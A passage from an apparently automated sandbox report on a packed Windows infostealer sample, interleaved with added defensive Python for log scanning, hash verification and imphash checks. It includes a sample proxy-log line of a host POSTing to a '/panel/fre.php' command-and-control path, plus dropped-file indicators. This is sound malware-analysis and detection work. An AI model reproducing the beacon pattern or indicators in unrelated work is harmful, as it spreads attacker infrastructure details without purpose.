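    "1642152272.310 40 10.0.0.23 TCP_MISS/404 300 POST http://203.0.113.50/panel/fre.php - HIER_DIRECT/203.0.113.50 text/html",
    "1642152273.422 31 10.0.0.24 TCP_MISS/200 900 GET http://example.com/index.html - HIER_DIRECT/198.51.100.7 text/html",
]

if __name__ == "__main__":
    for number, reasons in scan(SAMPLE_LOG):
        print(number, "; ".join(reasons))
```

Run against the constructed lines, the first line is flagged on both host and path, the ibsensoftware.com fetch is correctly ignored, and the third line is reported only on the weaker generic rule; that last category deserves a triage step rather than an automatic block, since any site may legitimately host a script by that name.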

                    General Information

                    Joe Sandbox Version:34.0.0 Boulder Opal
                    Analysis ID:553072
                    Start date:14.01.2022
                    Start time:09:23:18
                    Joe Sandbox Product:CloudBasic
                    Overall analysis duration:0h 5m 41s
                    Hypervisor based Inspection enabled:false
                    Report type:light
                    Sample file name:__.exe
                    Cookbook file name:default.jbs
                    Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                    Number of new started processes analysed:21
                    Number of new started drivers analysed:0
                    Number of existing processes analysed:0
                    Number of existing drivers analysed:0
                    Number of injected processes analysed:0
                    Technologies:
                    • HCA enabled
                    • EGA enabled
                    • HDC enabled
                    • AMSI enabled
                    Analysis Mode:default
                    Analysis stop reason:Timeout
                    Detection:MAL
                    Classification:mal100.troj.spyw.evad.winEXE@3/6@56/1
                    EGA Information:
                    • Successful, ratio: 100%
                    HDC Information:
                    • Successful, ratio: 88.3% (good quality ratio 85.6%)
                    • Quality average: 80.7%
                    • Quality standard deviation: 26.7%
                    HCA Information:
                    • Successful, ratio: 88%
                    • Number of executed functions: 0
                    • Number of non-executed functions: 0
                    Cookbook Comments:
                    • Adjust boot time
                    • Enable AMSI
                    • Found application associated with file extension: .exe
                    Warnings:
                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe, wuapihost.exe
                    • HTTP Packets have been reduced
                    • TCP Packets have been reduced to 100
                    • Excluded IPs from analysis (whitelisted): 23.211.6.115
                    • Excluded domains from analysis (whitelisted): ris.api.iris.microsoft.com, e12564.dspb.akamaiedge.net, store-images.s-microsoft.com, ctldl.windowsupdate.com, store-images.s-microsoft.com-c.edgekey.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, arc.msn.com
                    • Not all processes were analyzed; the report is missing behavior information
                    • Report size getting too big, too many NtDeviceIoControlFile calls found.
                    • Report size getting too big, too many NtQueryValueKey calls found.

                    Simulations

                    Behavior and APIs

                    Time | Type | Description
                    09:24:24 | API Interceptor | 53x Sleep call for process: __.exe modified

                    Joe Sandbox View / Context

                    IPs

                    No context

                    Domains

                    No context

                    ASN

                    No context

                    JA3 Fingerprints

                    No context

                    Dropped Files

                    No context

                    Created / dropped Files

                    C:\Users\user\AppData\Local\Temp\nsjD68.tmp
                    Process:C:\Users\user\Desktop\__.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):250769
                    Entropy (8bit):7.762180757879711
                    Encrypted:false
                    SSDEEP:3072:C4wPAhYqnzXSf+qIVzB1omvyj4JFR59YLv45oKPwHrcW7F7CtOz:LwohYqnrt91BZvycJFXGvyIcmFX
                    MD5:A7EF0A59978ABC0CB3C0A85906BE0161
                    SHA1:34F37AC927835F0C9F604ADF5F2E9B3FB6B97539
                    SHA-256:F107CF5C0D3A00F20BDF7497BDD2CFF8AF63027833E286763E9E177763871388
                    SHA-512:65B80E53683C8E9A715F068A3CCB1600CDF49CF53451BB3C6421A2DBA162080C86A1A56192B98D0326E41A14A0AF2B08340A9DB1CE50AAD94BC93E24CEFEF81D
                    Malicious:false
                    Reputation:low
                    Preview: 1W......,.......................lA......KV.......W..........................................................................................................................................................................................................................................J...................j.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                    C:\Users\user\AppData\Local\Temp\nsjD69.tmp\firfslz.dll
                    Process:C:\Users\user\Desktop\__.exe
                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                    Category:dropped
                    Size (bytes):4608
                    Entropy (8bit):4.173898700356354
                    Encrypted:false
                    SSDEEP:48:SpoRIUTb4g3e7eKgJKXIkuW2yH+ZsQMR7/iItlRuqS99nhR:ZRS2e7etJ0FuoH+ZdcZxwh
                    MD5:57164986833DAF48BE0E0D9C1871A009
                    SHA1:EFCE1DD97671F954A1F342EC3AEA8AC0C90FE020
                    SHA-256:881D216BDA06FBCD5809BA113EE4574FB5D464DBE464E8627B52973C08DBA5A3
                    SHA-512:05D5908207511EE5A8075659F1D63DE21963738398560CC15850603C186B2BE76841D5C594AD673D68C30D2FC0DCE0E7340F29A6EBCE751AC3B1B3FDED713EF6
                    Malicious:true
                    Antivirus:
                    • Antivirus: Virustotal, Detection: 14%
                    • Antivirus: ReversingLabs, Detection: 8%
                    Reputation:low
                    Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........x-2..Ca..Ca..CaZ.Ma..Ca..B`..Ca..Ba..Ca.lG`..Ca.lC`..Ca.l.a..Ca.lA`..CaRich..Ca........PE..L...X..a...........!......................... ...............................P............@.......................... ..L....!.......0.......................@..\.................................................... ...............................text............................... ..`.rdata..l.... ......................@..@.rsrc........0......................@..@.reloc..\....@......................@..B........................................................................................................................................................................................................................................................................................................................................................................................
                    C:\Users\user\AppData\Local\Temp\nsqvmlbcyr
                    Process:C:\Users\user\Desktop\__.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):5432
                    Entropy (8bit):6.087044084001559
                    Encrypted:false
                    SSDEEP:96:KALZVbpT0Su7ws144QsAAmXekW6YZtoE0IEJ3tdn0o9i6DEHDvdA:HLZscPs/mOkSZF0IUh7DyJA
                    MD5:3A01C4787585868250B9F281A7845795
                    SHA1:057BD395F2C87952FDE385C6ED75B1E574C77CFC
                    SHA-256:FC90C681214CD63C37F7E60EC7872F2B1A8244BBDC26C8FBBF041C4A9CCF948F
                    SHA-512:0B3A523064B28318EC34389A0C5895DF866AFFC0E8312CAFF5E3F2A50BA5811C0EBC54BD19F88F4C6D80F93E3341989081C1B88335D4467ACFBD35FA8959295C
                    Malicious:false
                    Reputation:low
                    Preview: l..WW....*!..(.W......w......o.(.WN.s.WWW.(.Wv8.v8....'opWWW.....v8.v8....'ooWWW....[v8.v8....'o.WWW.....Cv8.v8....'o9WWW.........K..%O...ZZ....w..k....oK....o.....o..s.K..]%.....oZ.s.KM..s.!.(..k.%.oWWWW.K....(sv8..v8..v8...v8...v8w.v8o...;...........T8.v8.....O....Z(soWWWWN..K.WWW.K....(......."..M.W..$$.........O.W......O.W..........K..s..O.W...O.T.....s..M.W..u..o..WWo).WWM.W..v..o.WWo..WWMOW.b.o.WWo.WWMOW..........oN...WWW....s...W;...s.WW..s...s.......rko..WW..;...O.%O...W........o.%O..tW......%.%O...W....'..v..o.TWW'oIpvv..r...o'v8Oo.vvv....W;Q.(.Wr.N.TWWW....MKW..........oN...WWW.....s...W;...s.WW..s...s.......rko.KWW.....WWW..O.%O...W.........%O..tW..........%O.t..........%O..]Z........o.%O..t.......%.%O...W....'..u..oqWWW'ozsvv.....W;O..o....Tr.v8.v8.v8.v8.v8Oo.yvv....W;Q.(.Wr.N.TWWW....M.W...SN...WWW..k..s...W;...s.WW..s...s.......rko%ZWW..;...O.%O...W..k..o...%O..tW..k..o%.%O...W...k'.b.o.WWW'o.svv..r.v8
                    C:\Users\user\AppData\Local\Temp\x3tnp7bgu2rwywf
                    Process:C:\Users\user\Desktop\__.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):218392
                    Entropy (8bit):7.989462233980479
                    Encrypted:false
                    SSDEEP:3072:NAhYqnzXSf+qIVzB1omvyj4JFR59YLv45oKPwHrcW7F7CtOzI:ihYqnrt91BZvycJFXGvyIcmFXk
                    MD5:08255E86024B19B780D684228C9A9C12
                    SHA1:A14F115B3CDFECED7D7645C01FFA47B067CDC578
                    SHA-256:1CA3B0CD593A604966C7B67E3E292ECED9E4DC2D67516AA636867A364C75339D
                    SHA-512:E84CCA2F400B513482ED56940091B5CAD38F6000CDF6120F1E798A8788A5EE8C673A7A803474C9ED84EEB2A88A6768E04A5594BA4E49CE8899B0E117230B6A97
                    Malicious:false
                    Reputation:low
                    Preview: _..}..5...Wq...L.....l...b..r>d)n..".......E.4...k7.."o....d...l.....7.......W..in....{..(/..J}.&..>.....`.o.&k.`~eO.R..._6r/....79Jc(#|#J.k~..kDc.v1q. ._..........Qc..*#f......,EL.r.h...O.Q.W5d...u..-.t.`..<..C .J....6...C...l.A._..q.....$.....M.}.....k.WS........l...b.Vr>db..."...#...E....k7...o..w.d......K.`...d..J.TMO+.......K0..q.6...{I{...)/\.p.^.=.O.R....'.NH.^..HV......:.@..AS..`...qc...M....O..s6...;-.l.h]*N...D.fP..m.....'x[...6...^U...{aeX.Mt7@.I..|.l.v.....@..*%.."...M.}}.5.I.W......:.l.(..b.e~>dNn..........E.4...o7...cU..d.2......K.q.....`.JzTM.+.....k....q.6...0I{...)..Hp~;~=.O.R....'.NH....HV......:.@..AS..`...qc...M....O..s6...;-.l.h]*N...D.fP..m......'x[...6...^U...{aeX.Mt7@...C...l..^_...@..........M.}}.5.I.WS........l.E..b..r>d)n..".......E.4...k7.."o..w.d..$.....K.`...d.`.JzTM.+.....k.K0..q.6...{I{...).uHp~^.=.O.R....'.NH.^..HV......:.@..AS..`...qc...M....O..s6...;-.l.h]*N...D.fP..m......'x[...6...^U...{aeX.Mt7@.
                    C:\Users\user\AppData\Roaming\C79A3B\B52B3F.lck
                    Process:C:\Users\user\Desktop\__.exe
                    File Type:very short file (no magic)
                    Category:dropped
                    Size (bytes):1
                    Entropy (8bit):0.0
                    Encrypted:false
                    SSDEEP:3:U:U
                    MD5:C4CA4238A0B923820DCC509A6F75849B
                    SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                    SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                    SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                    Malicious:false
                    Reputation:high, very likely benign file
                    Preview: 1
                    C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-3853321935-2125563209-4053062332-1002\414045e2d09286d5db2581e0d955d358_d06ed635-68f6-4e9a-955c-4899f5f57b9a
                    Process:C:\Users\user\Desktop\__.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):46
                    Entropy (8bit):1.0424600748477153
                    Encrypted:false
                    SSDEEP:3:/lbON:u
                    MD5:89CA7E02D8B79ED50986F098D5686EC9
                    SHA1:A602E0D4398F00C827BFCF711066E67718CA1377
                    SHA-256:30AC626CBD4A97DB480A0379F6D2540195F594C967B7087A26566E352F24C794
                    SHA-512:C5F453E32C0297E51BE43F84A7E63302E7D1E471FADF8BB789C22A4D6E03712D26E2B039D6FBDBD9EBD35C4E93EC27F03684A7BBB67C4FADCCE9F6279417B5DE
                    Malicious:false
                    Reputation:moderate, very likely benign file
                    Preview: ........................................user.
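The per-file fields above (size, 8-bit entropy, MD5/SHA-1/SHA-256/SHA-512) are cheap to recompute, and doing so before reusing a value as an indicator catches transcription errors. B52B3F.lck is the clearest case: its preview shows a single byte "1", so its hashes are simply the hashes of "1" and its entropy is 0.0. The Python below is an added example, not part of the report and not code from the sample. The expected values are copied from the B52B3F.lck entry; the %APPDATA%\<6 hex>\<6 hex>.lck path pattern follows public Lokibot analyses, which report that both names are derived from the host's MachineGuid, so the literal C79A3B\B52B3F is specific to the sandbox host and only the pattern is portable; the entropy thresholds are the example's own rules of thumb, not values the report uses.

```python
"""Recompute the report's hash and entropy fields for a dropped file.

Added example, not part of the Joe Sandbox report. Expected values are
copied from the report entry for
C:\\Users\\user\\AppData\\Roaming\\C79A3B\\B52B3F.lck, whose preview shows
the file is the single byte "1". Verdict thresholds are this example's own.
"""
import hashlib
import math
import re


def shannon_entropy(data: bytes) -> float:
    """8-bit Shannon entropy in bits per byte (0.0 to 8.0), the measure
    behind the report's 'Entropy (8bit)' column."""
    if not data:
        return 0.0
    n = len(data)
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    return -sum((c / n) * math.log2(c / n) for c in counts if c)


def digests(data: bytes) -> dict:
    """Upper-case hex digests in the same algorithms the report lists."""
    return {name: hashlib.new(name, data).hexdigest().upper()
            for name in ("md5", "sha1", "sha256", "sha512")}


# Values copied from the report's B52B3F.lck entry.
REPORT_LOCK_FILE = {
    "size": 1,
    "entropy": 0.0,
    "md5": "C4CA4238A0B923820DCC509A6F75849B",
    "sha1": "356A192B7913B04C54574D18C28D46E6395428AB",
    "sha256": "6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B",
    "sha512": "4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A",
}
LOCK_FILE_CONTENT = b"1"  # the byte the report's preview shows


def verify_against_report(data: bytes, expected: dict) -> dict:
    """Return {field: (expected, observed)} for every field that disagrees.
    An empty dict means the bytes are consistent with the report entry."""
    observed = {"size": len(data), "entropy": shannon_entropy(data), **digests(data)}
    mismatches = {}
    for field, want in expected.items():
        got = observed[field]
        same = math.isclose(got, want, abs_tol=1e-6) if isinstance(want, float) else got == want
        if not same:
            mismatches[field] = (want, got)
    return mismatches


# %APPDATA%\<6 hex>\<6 hex>.lck; per public Lokibot analyses the names are
# derived from the MachineGuid, so match the shape, not the literal names.
LOCK_PATH_RE = re.compile(r"\\AppData\\Roaming\\[0-9A-F]{6}\\[0-9A-F]{6}\.lck$", re.IGNORECASE)


def is_lokibot_lock_path(path: str) -> bool:
    return bool(LOCK_PATH_RE.search(path))


def entropy_verdict(entropy: float) -> str:
    """Rules of thumb for this example, not thresholds used by the report."""
    if entropy >= 7.9:
        return "near-random: compressed or encrypted"
    if entropy >= 7.0:
        return "high: likely packed or contains compressed data"
    if entropy >= 4.0:
        return "medium: typical code or mixed data"
    return "low: sparse or repetitive data"


if __name__ == "__main__":
    print("mismatches:", verify_against_report(LOCK_FILE_CONTENT, REPORT_LOCK_FILE))
    for name, e in (("x3tnp7bgu2rwywf", 7.989462233980479), ("nsjD68.tmp", 7.762180757879711),
                    ("firfslz.dll", 4.173898700356354), ("B52B3F.lck", 0.0)):
        print(name, round(e, 3), entropy_verdict(e))
```

Applied to the report's own entropy values, the two large blobs dropped into %TEMP% (7.99 and 7.76) land in the compressed-or-encrypted band, consistent with them being the encrypted payload stages the NSIS plugin firfslz.dll unpacks, while the plugin itself (4.17) looks like ordinary code.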

                    Static File Info

                    General

                    File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                    Entropy (8bit):7.921819184073758
                    TrID:
                    • Win32 Executable (generic) a (10002005/4) 92.16%
                    • NSIS - Nullsoft Scriptable Install System (846627/2) 7.80%
                    • Generic Win/DOS Executable (2004/3) 0.02%
                    • DOS Executable Generic (2002/1) 0.02%
                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                    File name:__.exe
                    File size:238317
                    MD5:e9b74bfb67bf3dcef39e23674d4dd63f
                    SHA1:6fc16b7fe6e2d6567bfd2cf68b407fc7f5097a93
                    SHA256:aeff0c4823c37fc2054f80c6bf7dafcf7fce8abb84d7b72a08fa67411d2aa480
                    SHA512:ae2386500840fbed380f46fafc1e3326f12ce87436be22ace0e536d6d9c83f4d77e27793c2d4fe30e607850b37c2eecb4ab35c8630fff2f8a5534d21349efb27
                    SSDEEP:6144:owyQnce+mjfo4FU/iUB9l1fXfCwcJA0b22:Vce+mjfoQU//Zf9n0C2
                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........uJ...$...$...$./.{...$...%.:.$.".y...$..7....$.f."...$.Rich..$.................PE..L......H.................Z..........%2.....

                    File Icon

                    Icon Hash:b2a88c96b2ca6a72

                    Static PE Info

                    General

                    Entrypoint:0x403225
                    Entrypoint Section:.text
                    Digitally signed:false
                    Imagebase:0x400000
                    Subsystem:windows gui
                    Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                    DLL Characteristics:
                    Time Stamp:0x48EFCDC9 [Fri Oct 10 21:48:57 2008 UTC]
                    TLS Callbacks:
                    CLR (.Net) Version:
                    OS Version Major:4
                    OS Version Minor:0
                    File Version Major:4
                    File Version Minor:0
                    Subsystem Version Major:4
                    Subsystem Version Minor:0
                    Import Hash:099c0646ea7282d232219f8807883be0

                    Entrypoint Preview

                    Instruction
                    sub esp, 00000180h
                    push ebx
                    push ebp
                    push esi
                    xor ebx, ebx
                    push edi
                    mov dword ptr [esp+18h], ebx
                    mov dword ptr [esp+10h], 00409128h
                    xor esi, esi
                    mov byte ptr [esp+14h], 00000020h
                    call dword ptr [00407030h]
                    push 00008001h
                    call dword ptr [004070B4h]
                    push ebx
                    call dword ptr [0040727Ch]
                    push 00000008h
                    mov dword ptr [00423F58h], eax
                    call 00007F16F4D3F910h
                    mov dword ptr [00423EA4h], eax
                    push ebx
                    lea eax, dword ptr [esp+34h]
                    push 00000160h
                    push eax
                    push ebx
                    push 0041F450h
                    call dword ptr [00407158h]
                    push 004091B0h
                    push 004236A0h
                    call 00007F16F4D3F5C7h
                    call dword ptr [004070B0h]
                    mov edi, 00429000h
                    push eax
                    push edi
                    call 00007F16F4D3F5B5h
                    push ebx
                    call dword ptr [0040710Ch]
                    cmp byte ptr [00429000h], 00000022h
                    mov dword ptr [00423EA0h], eax
                    mov eax, edi
                    jne 00007F16F4D3CDDCh
                    mov byte ptr [esp+14h], 00000022h
                    mov eax, 00429001h
                    push dword ptr [esp+14h]
                    push eax
                    call 00007F16F4D3F0A8h
                    push eax
                    call dword ptr [0040721Ch]
                    mov dword ptr [esp+1Ch], eax
                    jmp 00007F16F4D3CE35h
                    cmp cl, 00000020h
                    jne 00007F16F4D3CDD8h
                    inc eax
                    cmp byte ptr [eax], 00000020h
                    je 00007F16F4D3CDCCh
                    cmp byte ptr [eax], 00000022h
                    mov byte ptr [eax+eax+00h], 00000000h

                    Rich Headers

                    Programming Language:
                    • [EXP] VC++ 6.0 SP5 build 8804

                    Data Directories

Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x73a4 | 0xb4 | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x2c000 | 0x900 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x7000 | 0x28c | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |

                    Sections

Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x5976 | 0x5a00 | False | 0.668619791667 | data | 6.46680044621 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata | 0x7000 | 0x1190 | 0x1200 | False | 0.444878472222 | data | 5.17796812871 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0x9000 | 0x1af98 | 0x400 | False | 0.55078125 | data | 4.68983486809 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.ndata | 0x24000 | 0x8000 | 0x0 | False | 0 | empty | 0.0 | IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc | 0x2c000 | 0x900 | 0xa00 | False | 0.409375 | data | 3.94693169534 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                    Resources

Name | RVA | Size | Type | Language | Country
RT_ICON | 0x2c190 | 0x2e8 | data | English | United States
RT_DIALOG | 0x2c478 | 0x100 | data | English | United States
RT_DIALOG | 0x2c578 | 0x11c | data | English | United States
RT_DIALOG | 0x2c698 | 0x60 | data | English | United States
RT_GROUP_ICON | 0x2c6f8 | 0x14 | data | English | United States
RT_MANIFEST | 0x2c710 | 0x1eb | XML 1.0 document, ASCII text, with very long lines, with no line terminators | English | United States

                    Imports

DLL | Import
KERNEL32.dll | CompareFileTime, SearchPathA, GetShortPathNameA, GetFullPathNameA, MoveFileA, SetCurrentDirectoryA, GetFileAttributesA, GetLastError, CreateDirectoryA, SetFileAttributesA, Sleep, GetTickCount, CreateFileA, GetFileSize, GetModuleFileNameA, GetCurrentProcess, CopyFileA, ExitProcess, SetFileTime, GetTempPathA, GetCommandLineA, SetErrorMode, LoadLibraryA, lstrcpynA, GetDiskFreeSpaceA, GlobalUnlock, GlobalLock, CreateThread, CreateProcessA, RemoveDirectoryA, GetTempFileNameA, lstrlenA, lstrcatA, GetSystemDirectoryA, GetVersion, CloseHandle, lstrcmpiA, lstrcmpA, ExpandEnvironmentStringsA, GlobalFree, GlobalAlloc, WaitForSingleObject, GetExitCodeProcess, GetModuleHandleA, LoadLibraryExA, GetProcAddress, FreeLibrary, MultiByteToWideChar, WritePrivateProfileStringA, GetPrivateProfileStringA, WriteFile, ReadFile, MulDiv, SetFilePointer, FindClose, FindNextFileA, FindFirstFileA, DeleteFileA, GetWindowsDirectoryA
USER32.dll | EndDialog, ScreenToClient, GetWindowRect, EnableMenuItem, GetSystemMenu, SetClassLongA, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongA, SetCursor, LoadCursorA, CheckDlgButton, GetMessagePos, LoadBitmapA, CallWindowProcA, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, RegisterClassA, TrackPopupMenu, AppendMenuA, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextA, GetDlgItemTextA, MessageBoxIndirectA, CharPrevA, DispatchMessageA, PeekMessageA, DestroyWindow, CreateDialogParamA, SetTimer, SetWindowTextA, PostQuitMessage, SetForegroundWindow, wsprintfA, SendMessageTimeoutA, FindWindowExA, SystemParametersInfoA, CreateWindowExA, GetClassInfoA, DialogBoxParamA, CharNextA, OpenClipboard, ExitWindowsEx, IsWindow, GetDlgItem, SetWindowLongA, LoadImageA, GetDC, EnableWindow, InvalidateRect, SendMessageA, DefWindowProcA, BeginPaint, GetClientRect, FillRect, DrawTextA, EndPaint, ShowWindow
GDI32.dll | SetBkColor, GetDeviceCaps, DeleteObject, CreateBrushIndirect, CreateFontIndirectA, SetBkMode, SetTextColor, SelectObject
SHELL32.dll | SHGetPathFromIDListA, SHBrowseForFolderA, SHGetFileInfoA, ShellExecuteA, SHFileOperationA, SHGetSpecialFolderLocation
ADVAPI32.dll | RegQueryValueExA, RegSetValueExA, RegEnumKeyA, RegEnumValueA, RegOpenKeyExA, RegDeleteKeyA, RegDeleteValueA, RegCloseKey, RegCreateKeyExA
COMCTL32.dll | ImageList_AddMasked, ImageList_Destroy, ImageList_Create
ole32.dll | CoTaskMemFree, OleInitialize, OleUninitialize, CoCreateInstance
VERSION.dll | GetFileVersionInfoSizeA, GetFileVersionInfoA, VerQueryValueA
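The Import Hash given above and the Entropy column of the section table are cheap static metrics, and the section table already says something worth reading before either is trusted: `.ndata` has a virtual size of 0x8000 but a raw size of 0, `.data` occupies 0x1af98 bytes in memory but only 0x400 on disk, and the import set (SHBrowseForFolderA, SHFileOperationA, GetPrivateProfileStringA, the ImageList_* calls) is an installer's, not a stealer's. That layout is consistent with an installer stub wrapping the LokiBot payload the report detects at runtime, in which case the imphash identifies the stub and would match every binary built with it, making it a weak pivot for this sample. The Python below is an added example, not part of the Joe Sandbox report: it recomputes the imphash from the import list exactly as printed, in pefile's normalisation, implements the entropy metric, and runs the section-table checks just described. The growth factor (4x) and packing threshold (7.0 bits) are the example's own assumptions. If the printed order is the import-directory order, the recomputed hash equals the reported 099c0646ea7282d232219f8807883be0.

```python
"""Reproduce the report's static PE metrics from its own tables (added example).
Import Hash and Entropy are recomputed; the section table is sanity-checked."""
import hashlib
import math
from collections import Counter

# Import table as listed in the report, DLL by DLL, in the order shown.
IMPORTS = [
    ("KERNEL32.dll",
     "CompareFileTime SearchPathA GetShortPathNameA GetFullPathNameA MoveFileA "
     "SetCurrentDirectoryA GetFileAttributesA GetLastError CreateDirectoryA "
     "SetFileAttributesA Sleep GetTickCount CreateFileA GetFileSize GetModuleFileNameA "
     "GetCurrentProcess CopyFileA ExitProcess SetFileTime GetTempPathA GetCommandLineA "
     "SetErrorMode LoadLibraryA lstrcpynA GetDiskFreeSpaceA GlobalUnlock GlobalLock "
     "CreateThread CreateProcessA RemoveDirectoryA GetTempFileNameA lstrlenA lstrcatA "
     "GetSystemDirectoryA GetVersion CloseHandle lstrcmpiA lstrcmpA "
     "ExpandEnvironmentStringsA GlobalFree GlobalAlloc WaitForSingleObject "
     "GetExitCodeProcess GetModuleHandleA LoadLibraryExA GetProcAddress FreeLibrary "
     "MultiByteToWideChar WritePrivateProfileStringA GetPrivateProfileStringA WriteFile "
     "ReadFile MulDiv SetFilePointer FindClose FindNextFileA FindFirstFileA DeleteFileA "
     "GetWindowsDirectoryA"),
    ("USER32.dll",
     "EndDialog ScreenToClient GetWindowRect EnableMenuItem GetSystemMenu SetClassLongA "
     "IsWindowEnabled SetWindowPos GetSysColor GetWindowLongA SetCursor LoadCursorA "
     "CheckDlgButton GetMessagePos LoadBitmapA CallWindowProcA IsWindowVisible "
     "CloseClipboard SetClipboardData EmptyClipboard RegisterClassA TrackPopupMenu "
     "AppendMenuA CreatePopupMenu GetSystemMetrics SetDlgItemTextA GetDlgItemTextA "
     "MessageBoxIndirectA CharPrevA DispatchMessageA PeekMessageA DestroyWindow "
     "CreateDialogParamA SetTimer SetWindowTextA PostQuitMessage SetForegroundWindow "
     "wsprintfA SendMessageTimeoutA FindWindowExA SystemParametersInfoA CreateWindowExA "
     "GetClassInfoA DialogBoxParamA CharNextA OpenClipboard ExitWindowsEx IsWindow "
     "GetDlgItem SetWindowLongA LoadImageA GetDC EnableWindow InvalidateRect SendMessageA "
     "DefWindowProcA BeginPaint GetClientRect FillRect DrawTextA EndPaint ShowWindow"),
    ("GDI32.dll", "SetBkColor GetDeviceCaps DeleteObject CreateBrushIndirect "
                  "CreateFontIndirectA SetBkMode SetTextColor SelectObject"),
    ("SHELL32.dll", "SHGetPathFromIDListA SHBrowseForFolderA SHGetFileInfoA ShellExecuteA "
                    "SHFileOperationA SHGetSpecialFolderLocation"),
    ("ADVAPI32.dll", "RegQueryValueExA RegSetValueExA RegEnumKeyA RegEnumValueA "
                     "RegOpenKeyExA RegDeleteKeyA RegDeleteValueA RegCloseKey RegCreateKeyExA"),
    ("COMCTL32.dll", "ImageList_AddMasked ImageList_Destroy ImageList_Create"),
    ("ole32.dll", "CoTaskMemFree OleInitialize OleUninitialize CoCreateInstance"),
    ("VERSION.dll", "GetFileVersionInfoSizeA GetFileVersionInfoA VerQueryValueA"),
]

# Section table as reported: (name, virtual size, raw size, entropy, characteristics).
SECTIONS = [
    (".text", 0x5976, 0x5a00, 6.4668, "IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ"),
    (".rdata", 0x1190, 0x1200, 5.1780, "IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ"),
    (".data", 0x1af98, 0x400, 4.6898, "IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ"),
    (".ndata", 0x8000, 0x0, 0.0, "IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ"),
    (".rsrc", 0x900, 0xa00, 3.9469, "IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ"),
]


def imphash_string(imports):
    """pefile's imphash input: 'dll.func' lowercased, DLL extension stripped, comma-joined
    in import-directory order (named imports only; pefile renders ordinals as 'ordNNN')."""
    parts = []
    for dll, funcs in imports:
        lib = dll.lower()
        for ext in (".dll", ".ocx", ".sys"):
            if lib.endswith(ext):
                lib = lib[: -len(ext)]
                break
        parts.extend(f"{lib}.{f.lower()}" for f in funcs.split())
    return ",".join(parts)


def imphash(imports):
    """MD5 of the normalised import string: the report's 'Import Hash' field."""
    return hashlib.md5(imphash_string(imports).encode("ascii")).hexdigest()


def shannon_entropy(data):
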